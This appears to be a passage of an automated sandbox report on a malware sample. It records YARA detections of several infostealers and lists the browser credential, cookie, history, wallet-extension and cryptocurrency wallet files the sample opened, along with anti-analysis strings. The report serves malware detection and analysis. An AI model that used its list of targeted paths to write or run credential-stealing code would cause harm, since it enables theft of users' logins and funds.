Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_009ECBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_00772517 GetTimeZoneInformation,

5_2_00772517

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

7_2_00405BFC

Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 5.2.skotes.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2092252463.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2123575459.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2675898098.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LiteHTTP Bot

Source: Yara match	File source: 35.2.53f7160658.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 53f7160658.exe PID: 6972, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match

File source: dump.pcap, type: PCAP

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49940 -> 104.154.220.71:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LiteHTTP Bot

Source: Yara match	File source: 35.2.53f7160658.exe.690000.0.unpack, type: UNPACKEDPE
